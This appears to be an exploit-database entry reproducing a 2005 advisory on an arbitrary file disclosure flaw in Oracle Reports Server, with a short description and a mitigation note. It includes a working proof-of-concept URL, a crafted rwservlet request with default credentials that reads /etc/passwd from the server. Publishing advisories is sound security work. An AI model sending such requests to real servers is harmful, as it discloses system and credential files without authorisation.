header-logo
Suggest Exploit
vendor:
Oracle Reports Server
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Disclosure
200
CWE
Product Name: Oracle Reports Server
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Oracle Reports Server Arbitrary File Disclosure Vulnerability

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary files. Reportedly, the server fails to restrict users from accessing parts of arbitrary files when handling specially crafted HTTP GET requests.

Mitigation:

Restrict access to the Oracle Reports Server and ensure that it is not accessible from untrusted networks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14312/info

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary files.

Reportedly, the server fails to restrict users from accessing parts of arbitrary files when handling specially crafted HTTP GET requests.

All versions of Oracle Reports Server are reported to be vulnerable to this issue. 

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd

Navigation

Suggest Exploit

Services By CQR